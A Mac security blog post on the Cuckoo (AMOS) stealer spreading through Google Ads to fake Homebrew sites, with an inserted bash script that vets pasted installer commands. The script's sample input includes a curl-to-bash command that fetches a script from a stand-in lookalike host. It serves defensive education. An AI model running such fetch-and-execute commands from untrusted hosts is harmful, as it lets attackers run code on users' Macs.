The Mac Security Blog

Cuckoo returns; Mac malware spreads via legit-looking Google Ads

Over the past couple years, we’ve written a lot about stealer malware that infects Macs. One malware family that frequently resurfaces is Atomic Stealer, or AMOS (short for Atomic macOS Stealer). AMOS is designed to exfiltrate sensitive data from infected Macs; this typically includes things like saved passwords, cookies, autofill text, and cryptocurrency wallets. A sub-variant known as Cuckoo first appeared in May 2024.

Just like last year, Cuckoo has been spreading in January 2025 via elaborate campaigns, leveraging malicious but legitimate-looking Google Ads that redirect to lookalike homepages with Trojan downloads. Here’s everything you need to know about the latest Cuckoo variants, and how to stay protected.


A brief history of Cuckoo Mac malware

Atomic macOS Stealer (AMOS, or AtomicStealer) first surfaced in late April 2023. At the time, a threat actor began selling it via Telegram as malware as a service, licensable for $1,000 per month. Since then, we’ve seen a plethora of AMOS variants emerge.

Most often, AMOS malware is distributed through malicious Google Ads campaigns. These poisoned Google ads appear at the top of search results, where many people will see and click on them. In some cases, the ads are virtually indistinguishable from legitimate Google Ads run by the real software companies they mimic.

Some antivirus companies dubbed a particular sub-class of AMOS variants “Cuckoo.” Back in May 2024, we wrote about Cuckoo variants that were spreading via poisoned Google Ads that looked like they redirected to the real Homebrew homepage, but in fact led to malware distribution sites.

Yet another Cuckoo variant emerges

On January 9, 2025, a malware researcher noted that Homebrew was back with a new lookalike homepage.

A little over a week later, more reports emerged with additional details; one developer reported that he had observed a malicious Google Ads campaign leading to a different fake Homebrew site. The next day, a malware researcher posted about a third fake Homebrew homepage.

The real Homebrew is a popular macOS software package manager.

Each of the new fake Homebrew homepages tries to trick users into copying and pasting a command from the site into their Mac’s Terminal app. While that might sound ridiculously suspicious and dangerous—and it normally would be—the legitimate Homebrew software is actually installed in this exact way. Both the Google Ads and lookalike pages are so convincing that many professionals have said they could have fallen for the scheme.

A fake Homebrew site, part of an AMOS/Cuckoo Mac malware campaign.

Compare for yourself. Would you have guessed correctly which is real, and which is fake?

The real Homebrew site. Ironically, it has a longer, more suspicious-looking install URL.
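A pre-flight check for pasted install commands, as an added example that is not from the original article: it accepts a one-liner only if every URL in it sits under an expected HTTPS prefix. The function name, the sample commands and the `example.invalid` host are constructed, and the trusted prefix is an assumption (the official Homebrew installer location) to confirm from a bookmarked copy of the project's site.

```shell
#!/usr/bin/env bash
# Added example: vet a copied installer one-liner before running it.

# Assumption: official Homebrew installer location (not quoted in the article).
TRUSTED_PREFIX="https://raw.githubusercontent.com/Homebrew/install/"

# vet_install_command "<pasted command>"
# Prints one verdict per URL; returns 0 only if every URL is trusted.
vet_install_command() {
  local cmd url urls status
  cmd=$1
  status=0
  # Extract every http(s) URL, stopping at whitespace, quotes or shell metacharacters.
  urls=$(printf '%s\n' "$cmd" | grep -Eio "https?://[^[:space:]\"')|;<>]+" || true)
  if [ -z "$urls" ]; then
    echo "REJECT: no URL found, nothing to verify"
    return 1
  fi
  while IFS= read -r url; do
    case $url in
      *..*|*@*)  # path traversal, or userinfo tricks such as trusted.host@other.host
        echo "REJECT: $url (suspicious URL syntax)"; status=1 ;;
      "$TRUSTED_PREFIX"*)
        echo "OK:     $url" ;;
      *)         # wrong host, wrong path, or plain http
        echo "REJECT: $url (not under $TRUSTED_PREFIX)"; status=1 ;;
    esac
  done <<EOF
$urls
EOF
  return "$status"
}

# Constructed sample input: the genuine command shape and a lookalike.
SAMPLE_REAL='/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'
SAMPLE_FAKE='/bin/bash -c "$(curl -fsSL https://brew-lookalike.example.invalid/install.sh)"'

for sample in "$SAMPLE_REAL" "$SAMPLE_FAKE"; do
  vet_install_command "$sample" || true
done
```

A passing check only confirms where the script comes from; it says nothing about what the script does once it runs.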

Interestingly, this is not the first time that malware has tried to disguise itself as Homebrew. As we mentioned, there was the first Cuckoo campaign in May 2024. Back in 2020, threat actors used another domain that was similar to that of the real Homebrew site, as part of a typosquatting campaign. And back in 2017, Mac malware known as Dok used “homebrew” in the filename of one of its LaunchAgents.

Don’t “just Google it”

We strongly recommend that everyone get out of the habit of “just Google it” to find legitimate sites. That habit often includes clicking on the first link without giving it much thought, under the assumption that Google won’t lead you astray, and will give you the correct result right at the top. Malware makers know this, of course, and that’s why they’re paying Google for the number-one position.

Until or unless Google does a much better job of vetting its ads, a better practice than “Google it” would be to bookmark trusted sites whenever possible, and to go back to those bookmarks in the future.

How can I keep my Mac safe from Cuckoo and other malware?

If you use Intego VirusBarrier, you’re already protected from this malware.

Intego VirusBarrier X9, included with Intego’s Mac Premium Bundle X9, is a powerful solution designed to protect against, detect, and eliminate Mac malware.

If you believe your Mac may be infected, or to prevent future infections, it’s best to use antivirus software from a trusted Mac developer. VirusBarrier is award-winning antivirus software, designed by Mac security experts, that includes real-time protection. It runs natively on both Intel- and Apple silicon-based Macs, and it’s compatible with Apple’s current Mac operating system, macOS Sonoma.

One of VirusBarrier’s unique features is that it can scan for malicious files on an iPhone, iPad, or iPod touch in user-accessible areas of the device. To get started, just attach your iOS or iPadOS device to your Mac via a USB cable and open VirusBarrier.

If you use a Windows PC, Intego Antivirus for Windows can keep your computer protected from malware.

How can I learn more?

This article will be updated soon with additional indicators of compromise (IOCs) for the Mac malware samples and malicious domains used in this Cuckoo campaign. Check back here and refresh the page later for further technical details.

To learn more about the previous Cuckoo variant, see Intego’s original report on OSX/Cuckoo malware.

Intego discovers new “Cuckoo” Mac malware mimicking Homebrew

Be sure to also check out our 2025 Apple malware forecast and our previous Mac malware articles from 2025 and earlier.

Each week on the Intego Mac Podcast, Intego’s Mac security experts discuss the latest Apple news, including security and privacy stories, and offer practical advice on getting the most out of your Apple devices. Be sure to follow the podcast to make sure you don’t miss any episodes.

You can also subscribe to our e-mail newsletter and keep an eye here on The Mac Security Blog for the latest Apple security and privacy news. And don’t forget to follow Intego on your favorite social media channels.
